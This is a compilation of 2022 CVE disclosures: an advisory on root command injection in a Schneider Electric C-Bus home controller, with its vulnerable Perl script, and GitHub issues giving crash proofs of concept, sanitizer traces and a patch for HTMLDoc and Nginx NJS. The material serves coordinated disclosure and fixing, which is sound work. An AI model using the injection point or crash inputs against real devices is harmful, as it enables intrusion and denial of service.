The home automation solution suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user via the 'name' GET parameter in 'delsnap.pl' Perl/CGI script which is used for deleting snapshots taken from the webcam.

Title: Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root Exploit  
Advisory ID: ZSL-2022-5710  
Type: Local/Remote  
Impact: System Access, DoS  
Risk: (4/5)  
Release Date: 20.07.2022

**Summary**

SpaceLogic C-Bus Home Automation System Lighting control and automation solutions for buildings of the future, part of SpaceLogic. SpaceLogic C-Bus is a powerful, fully integrated system that can control and automate lighting and many other electrical systems and products. The SpaceLogic C-Bus system is robust, flexible, scalable and has proven solutions for buildings of the future. Implemented for commercial and residential buildings automation, it brings control, comfort, efficiency and ease of use to its occupants.

Wiser Home Control makes technologies in your home easy by providing seamless control of music, home theatre, lighting, air conditioning, sprinkler systems, curtains and shutters, security systems... you name it. Usable anytime, anywhere even when you are away, via preset shortcuts or direct control, in the same look and feel from a wall switch, a home computer, or even your smartphone or TV - there is no wiser way to enjoy 24/7 connectivity, comfort and convenience, entertainment and peace of mind homewide!

The Wiser 2 Home Controller allows you to access your C-Bus using a graphical user interface, sometimes referred to as the Wiser 2 UI. The Wiser 2 Home Controller arrives with a sample project loaded and the user interface accessible from your local home network. With certain options set, you can also access the Wiser 2 UI from anywhere using the Internet. Using the Wiser 2 Home Controller you can: control equipment such as IP cameras, C-Bus devices and non C-Bus wired and wireless equipment on the home LAN, schedule events in the home, create and store scenes on-board, customise a C-Bus system using the on-board Logic Engine, monitor the home environment including C-Bus and security systems, control ZigBee products such as Ulti-ZigBee Dimmer, Relay, Groups and Curtains.

Examples of equipment you might access with Wiser 2 Home Controller include lighting, HVAC, curtains, cameras, sprinkler systems, power monitoring, Ulti-ZigBee, multi-room audio and security controls.

**Description**

The home automation solution suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user via the 'name' GET parameter in 'delsnap.pl' Perl/CGI script which is used for deleting snapshots taken from the webcam.

\--------------------------------------------------------------------------------

/www/delsnap.pl:  
----------------

01: #!/usr/bin/perl  
02: use IO::Handle;  
03:  
04:  
05: select(STDERR);  
06: $| = 1;  
07: select(STDOUT);  
08: $| = 1;  
09:  
10: #print "\r\n\r\n";  
11:  
12: $CGITempFile::TMPDIRECTORY = '/mnt/microsd/clipsal/ugen/imgs/';  
13: use CGI;  
14:  
15: my $PROGNAME = "delsnap.pl";  
16:  
17: my $cgi = new CGI();  
18:  
19: my $name = $cgi->param('name');  
20: if ($name eq "list") {  
21:     print "\r\n\r\n";  
22:     print "DATA=";  
23:     print `ls -C1 /mnt/microsd/clipsal/ugen/imgs/`;  
24:     exit(0);  
25: }  
26: if ($name eq "deleteall") {  
27:     print "\r\n\r\n";  
28:     print "DELETINGALL=TRUE&";  
29:     print `rm /mnt/microsd/clipsal/ugen/imgs/*`;  
30:     print "COMPLETED=true\n";  
31:     exit(0);  
32: }  
33: #print "name $name\n";  
34: print "\r\n\r\n";  
35: my $filename = "/mnt/microsd/clipsal/ugen/imgs/$name";  
36:  
37: unlink $filename or die "COMPLETED=false\n";  
38:  
39: print "COMPLETED=true\n";

  
\--------------------------------------------------------------------------------

**Vendor**

Schneider Electric SE - https://www.se.com

**Affected Version**

SpaceLogic C-Bus Home Controller (5200WHC2)  
formerly known as C-Bus Wiser Home Controller MK2  
V1.31.460 and prior  
Firmware: 604

**Tested On**

Machine: OMAP3 Wiser2 Board  
CPU: ARMv7 revision 2  
GNU/Linux 2.6.37 (armv7l)  
BusyBox v1.22.1  
thttpd/2.25b  
Perl v5.20.0  
Clipsal 81  
Angstrom 2009.X-stable  
PICED 4.14.0.100  
lighttpd/1.7  
GCC 4.4.3  
NodeJS v10.15.3

**Vendor Status**

\[27.03.2022\] Vulnerability discovered.  
\[31.03.2022\] Reported the vulnerability to the vendor.  
\[31.03.2022\] Vendor receives PoC, starts analysis and creates SE-6334 (Remote Root Exploit).  
\[11.04.2022\] Asked vendor for confirmation and status update.  
\[11.04.2022\] Vendor is still analyzing the vulnerability. Will let us know once the case is confirmed.  
\[20.04.2022\] Asked vendor for confirmation and scheduled patch release date.  
\[21.04.2022\] Vendor is still analyzing.  
\[30.04.2022\] Asked vendor for status update.  
\[02.05.2022\] Vendor states that the product team has finalized their action plan and has provided a tentative fix release date of end of June.  
\[02.05.2022\] Replied to the vendor.  
\[02.05.2022\] The product team is working diligently on the fix. If there are any changes to the release date, we will let you know immediately.  
\[03.06.2022\] Asked vendor for status update.  
\[03.06.2022\] Vendor responds, tentative fix release date remains end of June.  
\[27.06.2022\] Asked vendor for status update.  
\[28.06.2022\] Vendor is finalizing the security notification and expecting to disclose on July 12th 2022.  
\[30.06.2022\] Vendor sends encrypted draft advisory for review.  
\[02.07.2022\] Sent our encrypted draft advisory for alignment of content.  
\[08.07.2022\] Vendor reviews the advisory and agrees that it is aligned with the contents. Provided advisory URL and asked for release date.  
\[10.07.2022\] Replied to the vendor with scheduled advisory release date.  
\[12.07.2022\] Vendor released advisory SEVD-2022-193-02.  
\[20.07.2022\] Coordinated public security advisory released.

**PoC**

SpaceLogic.ps1

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

\[1\] https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp  
\[2\] https://download.schneider-electric.com/files?p\_enDocType=Security+and+Safety+Notice&p\_File\_Name=SEVD-2022-193-02\_SpaceLogic-C-Bus-Home-Controller-Wiser\_MK2\_Security\_Notification.pdf  
\[3\] https://www.se.com/ww/en/work/support/cybersecurity/wall-of-thanks.jsp  
\[4\] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34753  
\[5\] https://nvd.nist.gov/vuln/detail/CVE-2022-34753

**Changelog**

\[20.07.2022\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root Exploit

The debug interface of Goldshell ASIC Miners v2.2.1 and below was discovered to be exposed publicly on the web interface, allowing attackers to access passwords and other sensitive information in plaintext.

CVE-2022-24660: Cryptocurrency ASIC Miners – Security and Hacking Audit – James A. Chambers

HTMLDoc v1.9.12 and below was discovered to contain a heap overflow via e_node htmldoc/htmldoc/html.cxx:588.

Hello, I found a heap-buffer-overflow in write\_node

Reporter:  
dramthy from Topsec Alpha Lab

test platform:  
htmldoc Version ：current  
OS :Ubuntu 20.04.1 LTS aarch64  
kernel: 5.4.0-53-generic  
compiler: gcc (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0

reproduced:

(htmldoc with asan build option)  
./htmldoc-with-asan ./poc.html  
poc.zip

    =================================================================
    ==25373==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xffff8680cacf at pc 0xaaaadb308c50 bp 0xffffe65857c0 sp 0xffffe65857e0
    READ of size 1 at 0xffff8680cacf thread T0
        #0 0xaaaadb308c4c in write_node /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:588
        #1 0xaaaadb3095d8 in write_all /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:543
        #2 0xaaaadb309630 in write_all /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:546
        #3 0xaaaadb309630 in write_all /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:546
        #4 0xaaaadb309630 in write_all /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:546
        #5 0xaaaadb309630 in write_all /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:546
        #6 0xaaaadb30a014 in write_all /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:538
        #7 0xaaaadb30a014 in html_export /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:167
        #8 0xaaaadb2ee52c in main /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/htmldoc.cxx:1291
        #9 0xffff8b72908c in __libc_start_main (/lib/aarch64-linux-gnu/libc.so.6+0x2408c)
        #10 0xaaaadb2ee984  (/home/vm1/workspace/Projects/afl-projects/001.htmldoc/bin-with-asan-fix-malloc2calloc+0x4b984)
    
    0xffff8680cacf is located 1 bytes to the left of 1-byte region [0xffff8680cad0,0xffff8680cad1)
    allocated by thread T0 here:
        #0 0xffff8befa66c in __interceptor_strdup (/lib/aarch64-linux-gnu/libasan.so.5+0x8966c)
        #1 0xaaaadb35e684 in htmlReadFile /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/htmllib.cxx:796
        #2 0xaaaadb30a55c in read_file /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/htmldoc.cxx:2492
        #3 0xaaaadb2ee1a0 in main /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/htmldoc.cxx:1177
        #4 0xffff8b72908c in __libc_start_main (/lib/aarch64-linux-gnu/libc.so.6+0x2408c)
        #5 0xaaaadb2ee984  (/home/vm1/workspace/Projects/afl-projects/001.htmldoc/bin-with-asan-fix-malloc2calloc+0x4b984)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:588 in write_node
    Shadow bytes around the buggy address:
      0x200ff0d01900: fa fa 00 06 fa fa 00 05 fa fa 00 06 fa fa 00 06
      0x200ff0d01910: fa fa 00 04 fa fa 00 05 fa fa 00 05 fa fa 00 06
      0x200ff0d01920: fa fa 00 04 fa fa 00 04 fa fa 00 05 fa fa 00 07
      0x200ff0d01930: fa fa 05 fa fa fa 00 00 fa fa 07 fa fa fa 06 fa
      0x200ff0d01940: fa fa 00 00 fa fa 04 fa fa fa 00 01 fa fa 05 fa
    =>0x200ff0d01950: fa fa 02 fa fa fa 02 fa fa[fa]01 fa fa fa 02 fa
      0x200ff0d01960: fa fa 00 05 fa fa 06 fa fa fa 03 fa fa fa 03 fa
      0x200ff0d01970: fa fa 04 fa fa fa 00 02 fa fa 00 02 fa fa 00 02
      0x200ff0d01980: fa fa 00 02 fa fa 00 02 fa fa 04 fa fa fa 04 fa
      0x200ff0d01990: fa fa 03 fa fa fa 03 fa fa fa 03 fa fa fa 00 05
      0x200ff0d019a0: fa fa 00 06 fa fa 00 05 fa fa 00 07 fa fa 00 07
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==25373==ABORTING
    
    
    

this bug in htmldoc/htmldoc/html.cxx:588:

    	  if (t->data[strlen((char *)t->data) - 1] == '\n')
                col = 0;
    

similar to

    #include <string.h>
    #include <iostream>
    int main()
    {
       const char * s = "";
       std::cout<<(int)(strlen((char *)s) - 1);
       return 0;
    }
    

the index out of bounds。

CVE-2022-34035: AddressSanitizer: heap-buffer-overflow on write_node htmldoc/htmldoc/html.cxx:588 · Issue #426 · michaelrsweet/htmldoc

Nginx NJS v0.7.4 was discovered to contain a segmentation violation via njs_value_property at njs_value.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

dramthy opened this issue

May 19, 2022

· 0 comments

**Comments**

Environment

Commit  : 6cef7f5055ec24275f0ae121c7f8709ff3e0c454
Version : 0.7.4
Build   : 
     ./configure \--cc\=clang \--address\-sanitizer\=YES     
     make

Proof of concept

    // minified
    function f() {}                                                                                                                         
    Object.defineProperty(f, 'length', {set: () => {}});                                                                                    
    Object.defineProperty(f, 'length', Object.getOwnPropertyDescriptor([], 'length'));                                                      
    f.length  
    

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==25984==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000004ea634 bp 0x7ffdd4213270 sp 0x7ffdd42130c0 T0)
    ==25984==The signal is caused by a READ memory access.
    ==25984==Hint: this fault was caused by a dereference of a high value address (see register values below).  Disassemble the provided pc to learn which register was used.
        #0 0x4ea634 in njs_value_property /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_value.c:1083:19
        #1 0x521273 in njs_object_length /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_object.c:2628:11
        #2 0x600a64 in njs_promise_race /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_promise.c:1727:11
        #3 0x54c08e in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_function.c:728:11
        #4 0x54a9a7 in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_function.c:766:16
        #5 0x4f9b4f in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_vmcode.c:799:23
        #6 0x54b526 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_function.c:693:11
        #7 0x54a9b9 in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_function.c:769:16
        #8 0x4f9b4f in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_vmcode.c:799:23
        #9 0x4f25ba in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_vm.c:541:11
        #10 0x4de3fd in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_shell.c:890:19
        #11 0x4dd98f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_shell.c:619:11
        #12 0x4dd98f in main /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_shell.c:303:15
        #13 0x7f7bafed2082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #14 0x41ea5d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-asan/build/njs+0x41ea5d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_value.c:1083:19 in njs_value_property
    ==25984==ABORTING
    
    
    

Credit  
dramthy(@topsec alpha)

 dramthy changed the title SEGV njs\_value.c:1083:19 in njs\_value\_property SEGV njs\_value.c:1083:19 in njs\_value\_property #bug #fuzzer

May 19, 2022

 dramthy changed the title SEGV njs\_value.c:1083:19 in njs\_value\_property #bug #fuzzer SEGV njs\_value.c:1083:19 in njs\_value\_property

May 19, 2022

2 participants

CVE-2022-34027: SEGV njs_value.c:1083:19 in njs_value_property · Issue #504 · nginx/njs

Nginx NJS v0.7.5 was discovered to contain a segmentation violation via njs_value_to_number at src/njs_value_conversion.h.

Environment

    Commit  : c62a9fb92b102c90a66aa724cb9054183a33a68c
    Version : 0.7.5
    Build   : 
         ./configure --cc=clang --address-sanitizer=YES     
         make
    

Proof of concept

    // Minimizing 74595E5A-F4AD-43DB-A4E9-34F2D366AD8A
    function placeholder(){}
    function main() {
    var v0 = /gL8?/;
    var v1 = {};
    var v2 = [v1,v1,v0];
    function v4(v5) {
        v2[1866532165] = undefined;
    }
    function v6(v7,v8) {
        function v10(v11) {
            v11[-4294967297] = Map;
        }
        var v13 = new Uint16Array(v2);
    }
    v1.valueOf = v4;
    var v15 = typeof Map;
    var v17 = typeof Map;
    var v19 = new Promise(v6);
    }
    main();
    // CRASH INFO
    // ==========
    // TERMSIG: 11
    // STDERR:
    
    

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==7855==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x00000063545b bp 0x7ffeac888710 sp 0x7ffeac8884e0 T0)
    ==7855==The signal is caused by a READ memory access.
    ==7855==Hint: address points to the zero page.
        #0 0x63545b in njs_value_to_number /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value_conversion.h:17:9
        #1 0x63545b in njs_typed_array_alloc /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_typed_array.c:171:19
        #2 0x63a56b in njs_typed_array_constructor /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_typed_array.c:229:13
        #3 0x575aae in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:728:11
        #4 0x573e1c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:766:16
        #5 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #6 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #7 0x573b65 in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16
        #8 0x573b65 in njs_function_call2 /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:592:11
        #9 0x648ed3 in njs_function_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.h:178:12
        #10 0x648ed3 in njs_promise_constructor_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_promise.c:214:11
        #11 0x648ed3 in njs_promise_constructor /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_promise.c:164:15
        #12 0x575aae in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:728:11
        #13 0x573e1c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:766:16
        #14 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #15 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #16 0x573e4f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16
        #17 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #18 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
        #19 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
        #20 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
        #21 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
        #22 0x7f8daaa33082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #23 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value_conversion.h:17:9 in njs_value_to_number
    ==7855==ABORTING
    
    

Credit  
dramthy(@topsec alpha)

CVE-2022-34031: SEGV src/njs_value_conversion.h:17:9 in njs_value_to_number · Issue #523 · nginx/njs

Nginx NJS v0.7.5 was discovered to contain a segmentation violation via njs_utf8_next at src/njs_utf8.h.

Environment

    Commit  : c62a9fb92b102c90a66aa724cb9054183a33a68c
    Version : 0.7.5
    Build   : 
         ./configure --cc=clang --address-sanitizer=YES     
         make
    

Proof of concept

    // Minimizing 811225C4-281E-48F6-8D83-E65B5DB8E211
    function placeholder(){}
    function main() {
    var v0 = "WbgAtnLEGv";
    var v2 = [10000,10000,10000,10000,10000];
    var v3 = 0.0;
    var v4 = undefined;
    var v6 = v2.includes();
    var v7 = 1;
    var v10 = NaN;
    var v11 = 3269;
    var v12 = "toUpperCase";
    var v14 = String["fromCharCode"](String,1156435285,String,3269);
    var v17 = `symbol${String}undefined${v14}number${v14}byteOffset${1156435285}e`["replace"](1156435285,v14);
    var v19 = Uint8ClampedArray.from(v17);
    }
    main();
    // CRASH INFO
    // ==========
    // TERMSIG: 11
    // STDERR:
    
    

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==9418==ERROR: AddressSanitizer: SEGV on unknown address 0x62505a68846a (pc 0x000000516e19 bp 0x7ffc9f96e8f0 sp 0x7ffc9f96e890 T0)
    ==9418==The signal is caused by a READ memory access.
        #0 0x516e19 in njs_utf8_next /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_utf8.h:52:9
        #1 0x516e19 in njs_string_offset /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_string.c:2539:17
        #2 0x516e19 in njs_string_slice_string_prop /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_string.c:1512:21
        #3 0x5176bf in njs_string_slice /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_string.c:1544:5
        #4 0x4f35dd in njs_string_property_query /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:910:16
        #5 0x4f189b in njs_object_property_query /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:693:27
        #6 0x4f189b in njs_property_query /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:622:15
        #7 0x4ef9fe in njs_value_property /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:1058:11
        #8 0x63b787 in njs_value_property_i64 /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.h:1087:12
        #9 0x63b787 in njs_typed_array_from /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_typed_array.c:407:15
        #10 0x575aae in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:728:11
        #11 0x573e1c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:766:16
        #12 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #13 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #14 0x573e4f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16
        #15 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #16 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
        #17 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
        #18 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
        #19 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
        #20 0x7f83cfee1082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #21 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_utf8.h:52:9 in njs_utf8_next
    ==9418==ABORTING
    
    

Credit  
dramthy(@topsec alpha)

CVE-2022-34028: SEGV src/njs_utf8.h:52:9 in njs_utf8_next · Issue #522 · nginx/njs

Nginx NJS v0.7.4 was discovered to contain an out-of-bounds read via njs_scope_value at njs_scope.h.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

dramthy opened this issue

May 30, 2022

· 2 comments

Assignees

**Comments**

Environment

Commit  : 9f4ebc96148308a8ce12f2b54432c87e6d78b881
Version : 0.7.4
Build   : 
     ./configure \--cc\=clang \--address\-sanitizer\=YES     
     make

Proof of concept

// Minimizing 34F6ED23-C193-452B-B724-E62BD7E15360
function placeholder(){}
function main() {
function v0(v1,v2,v3,v4,...v5) {
    try {
        async function v7(v8,v9,v10,v11) {
            var v12 \= await Proxy;
        }
        var v13 \= v0();
    } catch(v14) {
    } finally {
    }
    var v15 \= {};
    var v16 \= /gL8?/;
    var v17 \= {};
    var v18 \= \[v15,v17,v16\];
    function v20(v21) {
        v18\[1866532165\] \= Map;
    }
    async function v24(v25,v26) {
        var v27 \= await Map;
    }
    function v28(v29,v30) {
    }
    var v32 \= new Promise(v28);
    var v34 \= v32\["catch"\]();
    var v37 \= {"get":Promise,"set":v24};
    var v38 \= Object.defineProperty(v34,"constructor",v37);
    async function v39(v40,v41) {
        var v42 \= await v38;
    }
    var v43 \= v39();
    var v44 \= v20(Map);
}
var v45 \= v0();
}
main();

Minified

function run\_then() {}

function f(n) {
    if (n \== 2) {
        return;
    }

    try {
        f(n + 1);
    } catch(e) {
    }

    var p \= new Promise(run\_then);
    Object.defineProperty(p, "constructor", {get: () \=> ({}).a.a});
    async function g() {
        await p;
    }

    g();

    throw 'QQ';
}

f(0);

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==815==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000040 (pc 0x0000004ff20b bp 0x7ffc7abf6030 sp 0x7ffc7abf5880 T0)
    ==815==The signal is caused by a READ memory access.
    ==815==Hint: address points to the zero page.
        #0 0x4ff20b in njs_scope_value /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_scope.h:74:12
        #1 0x4ff20b in njs_scope_valid_value /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_scope.h:84:13
        #2 0x4ff20b in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:155:13
        #3 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
        #4 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
        #5 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
        #6 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
        #7 0x7f8dc7694082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #8 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_scope.h:74:12 in njs_scope_value
    ==815==ABORTING
    
    
    

Credit  
dramthy(@topsec alpha)

 dramthy changed the title SEGV njs\_scope.h:74:12 Heap-based Buffer Overflow in njs\_scope\_value SEGV njs\_scope.h:74:12 Out-of-bounds Read in njs\_scope\_value

May 30, 2022

Copy link

Contributor

** **xeioex** commented Jun 2, 2022**

The patch

# HG changeset patch
# Parent  d63163569c25cb90fe654f0fedefde43553f833a
Fixed njs\_vmcode\_interpreter() when await fails.

Previously, while interpreting a user function, njs\_vmcode\_interpreter()
might return prematurely when an error happens in await instruction.
This is not correct because the current frame has to be unwound (or
exception caught) first.

The fix is exit through only 5 appropriate exit points to ensure
proper unwinding.

The patch correctly fixes issue reported in 07ef6c1f04f1 (0.7.3).

This closes #506 issue on Github.

diff --git a/src/njs\_vmcode.c b/src/njs\_vmcode.c
\--- a/src/njs\_vmcode.c
+++ b/src/njs\_vmcode.c
@@ -858,7 +858,12 @@ next:
 
                 njs\_vmcode\_debug(vm, pc, "EXIT AWAIT");
 
\-                return njs\_vmcode\_await(vm, await, promise\_cap, async\_ctx);
+                ret = njs\_vmcode\_await(vm, await, promise\_cap, async\_ctx);
+                if (njs\_slow\_path(ret == NJS\_ERROR)) {
+                    goto error;
+                }
+
+                return ret;
 
             case NJS\_VMCODE\_TRY\_START:
                 ret = njs\_vmcode\_try\_start(vm, value1, value2, pc);
@@ -1923,6 +1928,7 @@ njs\_vmcode\_await(njs\_vm\_t \*vm, njs\_vmcod
 
     value = njs\_scope\_valid\_value(vm, await->retval);
     if (njs\_slow\_path(value == NULL)) {
+        njs\_internal\_error(vm, "await->retval is invalid");
         return NJS\_ERROR;
     }
 

Yes, I check the patch is valid for #506,#508,#509,#510,#511,#512,#513,#514,#515,#516,#518,#519,#520,#521,#525,#526,#527,#528. @xeioex

2 participants

CVE-2022-34029: SEGV njs_scope.h:74:12 Out-of-bounds Read in njs_scope_value · Issue #506 · nginx/njs

Nginx NJS v0.7.5 was discovered to contain a segmentation violation via njs_djb_hash at src/njs_djb_hash.c.

Environment

Commit  : c756e23eb09dac519fe161c88587cc034306630f (high:1882)
Version : 0.7.5
Build   : 
     ./configure \--cc\=clang \--address\-sanitizer\=YES     
     make

Proof of concept

    // Minimizing 8AC3654E-F5A1-405C-B380-951904AD058C
    function placeholder(){}
    function main() {
    var v1 = Function;
    var v6 = [930866.8987935185,930866.8987935185,930866.8987935185,930866.8987935185];
    var v8 = [v6,1050462187];
